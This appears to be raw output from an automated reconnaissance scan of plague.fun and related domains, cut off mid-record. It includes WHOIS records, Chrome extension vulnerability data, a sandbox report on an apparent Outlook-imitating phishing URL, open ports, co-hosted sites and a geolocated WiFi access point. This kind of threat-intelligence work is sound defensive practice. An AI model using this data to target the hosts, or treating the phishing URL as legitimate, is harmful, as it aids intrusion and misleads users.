Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:23:09 Raw Data from RIRs No CRXcavator 1 0 1 0 None [{"platform": "Chrome", "version": "0.3", "data": {"webstore": {"website": "", "rating": 5, "privacy_policy": "http://newtabwallpaperstheme.com/privacy", "last_updated": "2018-12-03", "name": "Plague Doctor Wallpapers Theme New Tab", "price": "", "offered_by": "newtabwallpaperstheme.com", "support_site": "", "version": "", "address": "", "short_description": "Plague Doctor Wallpapers for chrome new tabs", "permission_warnings": ["Your data on mail.google.com, google.com, and 2 other websites", "Your list of installed apps, extensions, and themes"], "users": 133, "size": "8.39MiB", "type": "Extension", "email": "support@newtabwallpaperstheme.com", "rating_users": 1, "icon": "https://lh3.googleusercontent.com/jGCoOssgGzBDnKcOK5LkF0fwWeX1BylKw01UYZaFRgkD09i-S4kSHLKYe31O0UauMzuXf3NPyw=w128-h128-e365"}, "extcalls": ["https://chrome.google.com/webstore/detail/", "https://www.facebook.com/sharer/sharer.php?u=", "https://plus.google.com/share?url=", "http://www.twitter.com/share?url=", "https://pinterest.com/pin/create/bookmarklet/?url=", "https://www.tumblr.com/widgets/share/tool?canonicalUrl=", "http://vk.com/share.php?url=", "http://newtabwallpaperstheme.com/privacy", "https://mail.google.com/mail/feed/atom", "https://www.google.com/", "http://newtabwallpaperstheme.com/search?q={searchTerms}", "https://www.facebook.com/", "https://www.google.com/s2/favicons?domain="], "retire": [{"results": [{"detection": "filecontent", "vulnerabilities": [{"info": ["https://github.com/jquery/jquery/issues/2432", "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "2432", "summary": "3rd party CORS request may execute"}, "severity": "medium"}, {"info": ["https://bugs.jquery.com/ticket/11974", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "11974", "summary": "parseHTML() executes scripts in event handlers"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11358", "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"], "identifiers": {"CVE": ["CVE-2019-11358"], "summary": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11022"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11023"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}], "version": "2.1.1", "component": "jquery"}], "file": "/tmp/mlbijjeimhmdbdomoalcpnelmlfjjclj_0.3/start/js/libs/jquery.min.js"}], "related": {"fnenbhacmjcbgjpldpmmpdkggbnnpdpg": {"rating": 4.9411764, "users": 1000, "platform": "", "short_description": "Replace your new tab with the Fortnite Skins Custom page, with bookmarks, apps, games and Fortnite pride wallpaper.", "icon": "https://lh3.googleusercontent.com/FBZStTgtgrVsKJY-43dOx_pmL4MN0Lh8pmsJbarYjRUXxFrhvMIUATUvpKAzyACcrzIX_O8Ct79IIJowIj7tlaMxQw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 17, "name": "Fortnite Skin Wallpaper HD New Tab Background"}, "mbnpofpbcpmigidknilkmpaiiddbpbmd": {"rating": 2.6052632, "users": 2000, "platform": "", "short_description": "Kakashi Hatake wallpapers extension offers great images with every new tab and was made for all fans of Kakashi Hatake.", "icon": "https://lh3.googleusercontent.com/4LeqGrjYaPJReoG-V7jG-z9o3mfPJ5j7b-fmoCDc26yyHv34DmPuEWUO7Bi92dYN_VOTd9aIw9cZbbcTbzPSKneAHeU=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 76, "name": "Kakashi Hatake HD Wallpaper New Tab"}, "knmhcfocgkhpdpdhepdgafamhkgkmkpo": {"rating": 4.0833335, "users": 4000, "platform": "", "short_description": "Give a clean and modern look to your default Chrome homepage", "icon": "https://lh3.googleusercontent.com/NLTW94zaXi7LutyVLF4VOuHavdLRTLh5Lw2MlJ8Pdl9WYRnJpAXb-KHnfa_K1TH4FpGXaPHHWA=w128-h128-e365", "rating_users": 36, "name": "The Predator New Tab"}, "mplmbihfomdmohbhcgaigdmdldaiabnm": {"rating": 4.8846154, "users": 2000, "platform": "", "short_description": "Replace your new tab with the Fortnite Game Custom page, with bookmarks, apps, games and Fortnite pride wallpaper.", "icon": "https://lh3.googleusercontent.com/Ct1i0v2sVwduqEpRFYB-e18MEstG-1_uOexfPBH2avrQnImMKwYj7oWMBEoSQcKy9poGv-y_39bGG-79zYuyHK2iwxw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26, "name": "Cool Fortnite Game Wallpaper HD New Tab"}, "nhaddphigjpecpkbppakcolcbchdlgnm": {"rating": 2.8396947, "users": 10000, "platform": "", "short_description": "Experience a new tab with breathtaking wallpapers and a personal dashboard that focus on your every day.", "icon": "https://lh3.googleusercontent.com/WRcBqIMMdZGcJAB-hhI0BoARoWxLDlTOAoeiPnlwMHNdCbpl6NeSCDFFzN30giPr-0DfKZGw=w128-h128-e365", "rating_users": 131, "name": "Crystal Dashboard - Chrome Startpage"}, "egopeokecbgdiiofbemdgbofafjepang": {"rating": 4.4764705, "users": 20000, "platform": "", "short_description": "Turn on dark theme on new tab. Enable night mode on browser home page.", "icon": "https://lh3.googleusercontent.com/7fPNQV7YTIi95SyC1w6nAXUTdpVk2TGm_5SC2uu5t7GwA_AzHUSznBwbjF1NA1ApH2t86AxTxxS1FUEULa3jpllJ7Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 170, "name": "Dark theme for new tab page"}, "meffljleomgifbbcffejnmhjagncfpbd": {"rating": 4.455157, "users": 200000, "platform": "", "short_description": "Reinvent Chrome Startpage with Infinite. Power up the new tab with Apps, Messengers, Games, Google & Apple Services", "icon": "https://lh3.googleusercontent.com/CA2-PN58mtwC0UnV1wltuL0Sgykvw-g8ex8uUb-3i1IxYSkgrAsA-K0-n7EhBYtfCl8qbwtAGRopXaYqcq4gy8DCig=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1338, "name": "Infinite Dashboard - New Tab like no other"}, "onjloafnnfndgpkdojhbhcebkpilfehi": {"rating": 2.1551895, "users": 10000, "platform": "", "short_description": "Install Fortnite HD Wallpapers New Tab Theme and get HD images of Fortnite characters with every new tab - outlanders, commandos..", "icon": "https://lh3.googleusercontent.com/qLSbMvAsI6u1718k8hzXYi7hz27iR5-6-wdYZ5go_PwVQOpDiW5_B9w1r3UlKWhGZh8YJG4gV9mX1eDL5-srhllXEg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2004, "name": "Fortnite HD Wallpapers New Tab Theme"}, "mmnicimdhohdpihiooibiclhbkddhjim": {"rating": 4.971338, "users": 10000, "platform": "", "short_description": "Cool 3D Backgrounds For A Stylish Home Screen!", "icon": "https://lh3.googleusercontent.com/vE05gDN0DCGYytkjx_VDFEh-K_GBJGLDMePvjdmQXwHLzI-R3sliHRa5Z5Hlo8WGN9tpmi8W7g=w128-h128-e365", "rating_users": 314, "name": "3D New Tab Wallpapers"}, "mncnjkognaelokhaogbplbajchofmjje": {"rating": 4.751773, "users": 20000, "platform": "", "short_description": "Get Pink Hd Wallpapers With Minigames Date And Time Add Ons", "icon": "https://lh3.googleusercontent.com/dgYRfqXFQXLaN6djZTARW-mu8hDbfy6-3ARAhmlaZIuZldrOwk7DLeUe4GymiXxnxj1ImifoiVk=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 423, "name": "Pink Tab HD Themes"}, "oiegmjnjcjanadhmfebiafogkhmlfllm": {"rating": 3.2666667, "users": 20000, "platform": "", "short_description": "Download all images from a website. Easily save photos from Instagram, Facebook, Pinterest, Google Images and other website.", "icon": "https://lh3.googleusercontent.com/O037nyE7ukNJ5iZXYe2qY1twLrqm05QgShmBWd65JWJ1NRGaMwj9cCwZ7gEHfSFEDuFMp7TCFoWcvqYZif1HuBYLlYU=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 30, "name": "Image Photo Downloader"}, "ogllliimbhgmclkgjldeffhjbhaenapo": {"rating": 4.2580166, "users": 38556, "platform": "", "short_description": "Modern New Tab Page replaces the traditional new tab page by a new beautiful and elegant one, made of customizable live tiles.", "icon": "https://lh3.googleusercontent.com/UFrRX-_vDHOo7_UrdyNio2_guR0EnXgUFffcxJPZhaqZHj8EEOh-RpbuzfJ_bzLArM06Q8hdIg=w128-h128-e365", "rating_users": 1341, "name": "Modern New Tab Page"}, "edjlmaphlhecmhhdgfooaiknmiiokhbe": {"rating": 4.882353, "users": 3000, "platform": "", "short_description": "Replace your new tab with the XXXTentacion Custom page, with bookmarks, apps, games and XXXTentacion wallpaper.", "icon": "https://lh3.googleusercontent.com/iTtrSQ19v--i4xFMwmNKmgJukVnAXaMsn0SbXP5zyFUaglnAbU0W6fdl8BkjbZrQ9-6mduJEO_kH7xxQrYGfgkIjrA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 51, "name": "XXXTentacion 4K Wallpapers New Tab"}, "lgecddhfcfhlmllljooldkbbijdcnlpe": {"rating": 4.1487455, "users": 100000, "platform": "", "short_description": "Give a clean and modern look to your default Chrome homepage", "icon": "https://lh3.googleusercontent.com/onrwvPDO6DBpE_PxtFRwEkRNZtWWAXKn12b0p4gemz93W-ICMOdRIDulMwGFA1YhvC0s02GnNxCsyPcknn2tnGly=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 558, "name": "Moment - #1 Personal Dashboard for Chrome"}, "ghabmoobnekiapiffifjdhgccbfbdgek": {"rating": 3.48, "users": 2000, "platform": "", "short_description": "The game features a map. We jumping into this map with a character we choose. We use a plane and parachute to jump.", "icon": "https://lh3.googleusercontent.com/1Bu9adHav1bGbuWBhJeu4kfPJBdLBVCAzWxwtM-v_ci7_s-pHSz8n183U1l43fcwW-LDJq0uWO3slInJjRWFMY5ToA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 25, "name": "PUBG Craft Battlegrounds Game New Tab"}, "mafmbfcmgifkdahieiddfiebgaabkdpd": {"rating": 3.787234, "users": 10000, "platform": "", "short_description": "Personalize your start page page with Speed Dial! Get custom backgrounds, layouts and tiles for your homepage.", "icon": "https://lh3.googleusercontent.com/VYkhN1MR_iQ_dnplc7_Q9jXzGbtrNuCfJi9Mq4E0reFT1ldgoQDg0ngWSugA99kgeIiMqBUJ=w128-h128-e365", "rating_users": 47, "name": "Speed Dial - New Tab Page"}, "opfnlonakpalmeppgacdllkpindpnfhf": {"rating": 4.6136365, "users": 2000, "platform": "", "short_description": "Get a lot of Razer Wallpapers for chromes new tab", "icon": "https://l plague.fun 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2082 188.114.96.1 2022-12-18 00:05:39 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://outlook.replypais.repl.co/index', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d44_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d44_IE_EarlyTabStart_0x83c_Mutex"\n "IsoScope_d44_IESQMMUTEX_0_519"\n "IsoScope_d44_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3396"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d44_ConnHashTable<3396>_HashTable_Mutex"\n "IsoScope_d44_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "llave_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "interro_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarCBF3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCC23.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"outlook.replypais.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabCBF2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabCC22.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "AENBQLG0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AENBQLG0.txt]- [targetUID: 00000000-00003396]\n Dropped file: "2X1W8C47.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2X1W8C47.txt]- [targetUID: 00000000-00003396]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "llave_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "gradient_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "interro_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "microsoft_logo_1_.svg" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003020]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "TarCBF3.tmp" has type "data"- Location: [%TEMP%\\TarCBF3.tmp]- [targetUID: 00000000-00003020]\n "jquery-latest.min_1_.js" has type "ASCII text"- [targetUID: N/A]\n "favicon_6_.ico" has type "MS Windows icon resource - 6 icons 128x128 16 colors 72x72 16 colors"- [targetUID: N/A]\n "TarCC23.tmp" has type "data"- Location: [%TEMP%\\TarCC23.tmp]- [targetUID: 00000000-00003020]\n "~DF8C0E42053E281C32.TMP" has type "data"- Location: [%TEMP%\\~DF8C0E42053E281C32.TMP]- [targetUID: 00000000-00003396]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "AENBQLG0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AENBQLG0.txt]- [targetUID: 00000000-00003396]\n "RecoveryStore._B3EA19C1-7A41-11ED-96E9-080027B6DEB7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003020]\n "~DFE105FA9D7FBFE963.TMP" has type "data"- Location: [%TEMP%\\~DFE105FA9D7FBFE963.TMP]- [targetUID: 00000000-00003396]\n "~DF0832042796416D80.TMP" has type "data"- Location: [%TEMP%\\~DF0832042796416D80.TMP]- [targetUID: 00000000-00003396]\n "~DF67F843241DC964C2.TMP" has type "data"- Location: [%TEMP%\\~DF67F843241DC964C2.TMP]- [targetUID: 00000000-00003396]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://outlook.replypais.repl.co/index"\n Pattern match: "https://outlook.replypais.repl.co"\n Heuristic match: "outlook.replypais.repl.co"'}], u'threat_level': 0, u'size': None, u'job_id': u'63977160e0209061d24439e2', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.149.204.188'], u'sha256': u'63084c4f7694ff0363e87eb78b9e77ef834e7180f085933041ffdcff428cc67b', u'sha512': u'f75edeec390f27707f95a0f28f71601e872894a104a9e846ff0277e3cf7918c42487c8ad8cd207aef81237e2e9c6a96abb4e42ec89ce3908f54bf357bdb6451e', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://outlook.replypais.repl.co/index', u'submission_id': u'63977160e0209061d24439e3', u'created_at': u'2022-12-12T18:22:24+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-12T18:22:25+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 100, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'09f3ef1c6e1a7af1911ce6fed607ce4b', u'network_mode': u'default', u'processes': [], u'sha1': u'80d2f410a673145698f5587131b3fc07cd6f1322', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'outlook.replypais.repl.co'], u'extracted_files': [], u'type_short': []}] 34.149.204.188 2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None auto-cash.xyz 172.67.147.230 2022-12-18 00:16:27 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.96.9 2022-12-18 00:33:51 Similar Domain - Whois No Whois 0 0 2 0 None Malformed request. >>> Last update of WHOIS database: 2022-12-18T00:33:51Z <<< Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. plague.duckdns.org 2022-12-18 00:24:58 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.186 90.116.149.183 2022-12-18 00:03:10 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.234 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 00:02:2D:05:7E:8A (Net ID: 00:02:2D:05:7E:8A) 37.7803446,-122.3906132 2022-12-18 00:16:57 HTTP Headers No Web Spider 0 0 2 0 None {"content-length": "664", "content-encoding": "gzip", "accept-ranges": "bytes", "vary": "Accept-Encoding", "connection": "keep-alive", "cache-control": "public", "date": "Sun, 18 Dec 2022 00:14:25 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "text/html; charset=UTF-8"} webmail.zerotwo-best-waifu.online 2022-12-18 00:02:53 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ce:73:2c:c8:b3:db:26:51:e1:69:3c:75:92:d7: ab:cf:10:67:fe:05:65:9a:30:2d:7c:2d:4e:bf:1e: 15:12:c0:09:9c:ee:72:a7:89:e2:dd:d3:84:6a:4b: 52:9b:7c:3a:1c:0c:22:4c:2d:61:74:cf:f3:4e:65: 58:68:18:ae:42 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EB:E4:FE:82:AF:4F:43:5A:7C:54:A8:CD:51:1C:E9:3D:A1:D3:59:44 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: 